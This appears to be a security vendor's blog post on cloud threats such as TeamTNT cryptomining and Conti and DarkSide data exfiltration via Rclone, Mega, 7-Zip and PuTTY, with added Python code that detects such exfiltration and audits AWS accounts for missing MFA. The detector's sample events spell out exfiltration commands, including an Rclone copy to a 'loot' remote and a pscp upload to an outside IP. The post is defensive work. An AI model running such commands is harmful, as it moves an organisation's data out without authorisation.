Threats Impacting Cloud Environments
In our first-half report, we spotlight an APT group named TeamTNT that has been targeting cloud environments for quite some time. They have focused most of their efforts on planting cryptocurrency-mining malware on cloud servers to mine Monero coins, but we have also seen them use DDoS IRC bots, steal cloud account credentials, and exfiltrate data. As you can see from the diagram above, all of these are end goals for many attacks.
Speaking of data exfiltration, in the first half we saw APT actors use cloud-based file storage to exfiltrate their stolen data. For example, we found that Conti operators use the cloud storage synchronization tool Rclone to upload files to the Mega cloud storage service. Similarly, DarkSide operators used the Mega client for exfiltrating files to cloud storage, 7-Zip for archiving, and the PuTTY suite for network file transfers. This use of known, legitimate tools is not new; we call it 'living off the land', and we have seen this tactic pick up recently, including among ransomware actors. Many organizations now need to look at ways of monitoring legitimate tool usage within their networks so that malicious uses can be identified, for example by watching which user and parent process launched the tool and where it is sending data.
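As an added example (not code from the report), the following Python script applies that monitoring idea to process-creation events shaped like the fields of a Sysmon Event ID 1 record (Image, CommandLine, ParentImage, User, OriginalFileName). It flags Rclone copying or syncing to a configured cloud remote, Mega client execution, 7-Zip building a password-protected archive, PuTTY transfers to a remote host, and a renamed binary whose OriginalFileName still identifies the tool. The event class, the allowlisted backup-agent path and every sample event are constructed for illustration.

```python
"""Flag living-off-the-land exfiltration tooling in process-creation events.

Added example, not code from the original report. Events mirror Sysmon
Event ID 1 fields; the sample events and the allowlisted backup agent are
constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    pid: int
    image: str                    # full path of the new process
    command_line: str
    parent_image: str = ""
    user: str = ""
    original_file_name: str = ""  # PE version-info name; survives a rename on disk


@dataclass
class Finding:
    pid: int
    rule: str
    reason: str


# Tool family for each executable name of interest
TOOLS = {
    "rclone.exe": "rclone", "rclone": "rclone",
    "megasync.exe": "mega", "megacmdserver.exe": "mega", "mega-put.exe": "mega",
    "7z.exe": "7zip", "7za.exe": "7zip", "7zg.exe": "7zip", "7z": "7zip",
    "pscp.exe": "putty", "psftp.exe": "putty", "plink.exe": "putty",
}

# Parents that legitimately drive these tools (assumed corporate backup agent)
ALLOWED_PARENTS = {r"c:\program files\backupagent\agent.exe"}

# rclone copy/sync/move to a configured remote ("name:path"); a Windows drive
# ("C:\") never matches because the remote name must be 2+ characters
RCLONE_REMOTE = re.compile(r"\b(copy|sync|move|copyto|moveto)\b.*\s([A-Za-z0-9_\-]{2,}):", re.I)
# 7-Zip "a" (add) with a -p password switch, i.e. an encrypted archive
ARCHIVE_PW = re.compile(r"\sa\s(?:.*\s)?-p\S*", re.I)
# pscp/psftp/plink with a user@host: target
PUTTY_XFER = re.compile(r"\S+@\S+:")


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def detect_lotl_exfil(events):
    findings = []
    for ev in events:
        name = basename(ev.image)
        orig = ev.original_file_name.lower()
        tool = TOOLS.get(name) or TOOLS.get(orig)
        if tool is None:
            continue
        if ev.parent_image.lower() in ALLOWED_PARENTS:
            continue  # known backup job; tune this allowlist per environment
        if orig in TOOLS and name != orig:
            findings.append(Finding(ev.pid, "renamed_tool",
                                    f"{name} carries OriginalFileName {orig}"))
            continue
        cl = ev.command_line
        if tool == "rclone" and (m := RCLONE_REMOTE.search(cl)):
            findings.append(Finding(ev.pid, "rclone_remote_upload",
                                    f"rclone {m.group(1)} to remote '{m.group(2)}:'"))
        elif tool == "mega":
            findings.append(Finding(ev.pid, "mega_client", f"Mega client {name} started"))
        elif tool == "7zip" and ARCHIVE_PW.search(cl):
            findings.append(Finding(ev.pid, "encrypted_archive",
                                    "7-Zip creating a password-protected archive"))
        elif tool == "putty" and (m := PUTTY_XFER.search(cl)):
            findings.append(Finding(ev.pid, "putty_transfer",
                                    f"{name} transfer to {m.group(0)}"))
    return findings


# Constructed sample events (pid 5 is a legitimate backup; pid 7 is benign)
SAMPLE_EVENTS = [
    Event(1, r"C:\Tools\rclone.exe",
          r"rclone.exe copy C:\Users\Finance\Documents mega-remote:loot -q --transfers 12",
          r"C:\Windows\System32\cmd.exe", r"CORP\j.doe", "rclone.exe"),
    Event(2, r"C:\Windows\Temp\svchost.exe",
          r"svchost.exe sync C:\Share\Contracts mega:contracts",
          r"C:\Windows\System32\cmd.exe", r"CORP\j.doe", "rclone.exe"),
    Event(3, r"C:\Program Files\7-Zip\7z.exe",
          r"7z.exe a -pSecret123 -mhe=on C:\Windows\Temp\arch.7z C:\Share\Contracts",
          r"C:\Windows\System32\cmd.exe", r"CORP\j.doe", "7z.exe"),
    Event(4, r"C:\Users\Public\pscp.exe",
          r"pscp.exe -pw Passw0rd C:\Windows\Temp\arch.7z user@203.0.113.5:/tmp/",
          r"C:\Windows\System32\cmd.exe", r"CORP\j.doe", "pscp.exe"),
    Event(5, r"C:\Tools\rclone.exe",
          r"rclone.exe sync D:\Backups backup-s3:corp-backups",
          r"C:\Program Files\BackupAgent\agent.exe", r"NT AUTHORITY\SYSTEM", "rclone.exe"),
    Event(6, r"C:\Users\j.doe\AppData\Local\MEGAsync\MEGAsync.exe", "MEGAsync.exe",
          r"C:\Windows\explorer.exe", r"CORP\j.doe", "MEGAsync.exe"),
    Event(7, r"C:\Windows\System32\notepad.exe", "notepad.exe",
          r"C:\Windows\explorer.exe", r"CORP\j.doe", "notepad.exe"),
]

if __name__ == "__main__":
    for f in detect_lotl_exfil(SAMPLE_EVENTS):
        print(f"pid={f.pid} {f.rule}: {f.reason}")
```

The parent-process allowlist is the part that keeps this usable: Rclone and 7-Zip are routinely run by backup jobs, so the rule suppresses a known parent rather than the tool itself. The OriginalFileName check matters because operators frequently rename these binaries; the version-info name still gives the tool away.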
Cloud Security Architecture
When developing your cloud security architecture and strategy, it is important to always keep the end result in mind. In this case: what are the motivation and end goals of an attacker?
As you can see in the image above, most cloud attacks fall into one of these areas. Depending on what you are running as part of your cloud infrastructure, you should be able to determine whether any or all of these end goals could be targeted in your environment. From there, you can work backwards to develop your strategy for protecting the initial access areas tied to the different attacks.
A challenge many organizations face is that the cloud is not simple, and many of the technologies that make up the cloud are new, with new features being deployed all the time. Understanding how these work and, more importantly, how to secure them can be very difficult. Using a security platform approach can help you build a more secure cloud, but educating your architects and administrators will also help. One key area is hardening your cloud account credentials, as these are frequently targeted by malicious actors. Requiring multi-factor authentication for access to all accounts greatly lowers this risk. Take a look at Trend Micro Cloud One, part of our full cybersecurity platform, to learn more.
The cloud is only one aspect of our full 1H 2021 report. To get more details on all the different threats and attacks we saw, download and read the full report here.
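To make the credential-hardening advice concrete, here is an added Python example (not Trend Micro code and not part of any product) that audits an AWS IAM credential report for sign-in paths that do not require MFA and produces the IAM policy pattern AWS documents for denying non-MFA sessions. The CSV, account ID and user names are constructed placeholders; the column names match the report returned by `aws iam get-credential-report`, with only the columns used here included.

```python
"""Find cloud accounts usable without MFA from an AWS IAM credential report,
and build the policy that denies everything else until MFA is present.

Added example, not Trend Micro code. REPORT_CSV is constructed with the column
names of `aws iam get-credential-report`; the account ID and user names are
placeholders.
"""
import csv
import io
from dataclasses import dataclass

REPORT_CSV = """user,arn,password_enabled,mfa_active,access_key_1_active,access_key_2_active
<root_account>,arn:aws:iam::123456789012:root,not_supported,false,true,false
alice,arn:aws:iam::123456789012:user/alice,true,true,true,false
bob,arn:aws:iam::123456789012:user/bob,true,false,false,false
carol,arn:aws:iam::123456789012:user/carol,true,false,true,false
deploy-bot,arn:aws:iam::123456789012:user/deploy-bot,false,false,true,true
"""

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2}


@dataclass
class Finding:
    user: str
    severity: str
    issue: str


def _flag(value: str) -> bool:
    return value.strip().lower() == "true"


def audit_credential_report(csv_text: str):
    """Return findings sorted by severity, then user name."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        user = row["user"]
        mfa = _flag(row["mfa_active"])
        active_keys = [n for n in ("1", "2") if _flag(row[f"access_key_{n}_active"])]
        if user == "<root_account>":
            # root always has a console password (password_enabled is "not_supported")
            if not mfa:
                findings.append(Finding(user, "critical", "root account has no MFA device"))
            if active_keys:
                findings.append(Finding(user, "critical", "root account has an active access key"))
            continue
        if _flag(row["password_enabled"]) and not mfa:
            findings.append(Finding(user, "high", "console password enabled without MFA"))
        for n in active_keys:
            # console MFA does nothing for API calls signed with a long-lived key
            findings.append(Finding(user, "medium",
                                    f"long-lived access key {n} is active; prefer roles and temporary credentials"))
    return sorted(findings, key=lambda f: (SEVERITY_ORDER[f.severity], f.user))


def mfa_enforcement_policy() -> dict:
    """Condensed form of AWS's documented pattern: deny every action except
    those needed to enrol an MFA device when the session was not MFA-authenticated."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "DenyAllExceptMfaEnrolmentIfNoMfa",
            "Effect": "Deny",
            "NotAction": [
                "iam:CreateVirtualMFADevice", "iam:EnableMFADevice",
                "iam:ListMFADevices", "iam:ListVirtualMFADevices",
                "iam:ResyncMFADevice", "iam:GetUser", "sts:GetSessionToken",
            ],
            "Resource": "*",
            "Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": "false"}},
        }],
    }


if __name__ == "__main__":
    for f in audit_credential_report(REPORT_CSV):
        print(f"[{f.severity}] {f.user}: {f.issue}")
```

Two points the report rows make visible: the root account is judged separately because it always has a password, and an active access key is reported even for users who have MFA, since MFA on console sign-in does not protect API calls made with a static key. The `BoolIfExists` condition in the policy is what makes the deny apply to sessions that never presented MFA at all, not only to those that explicitly report it as false.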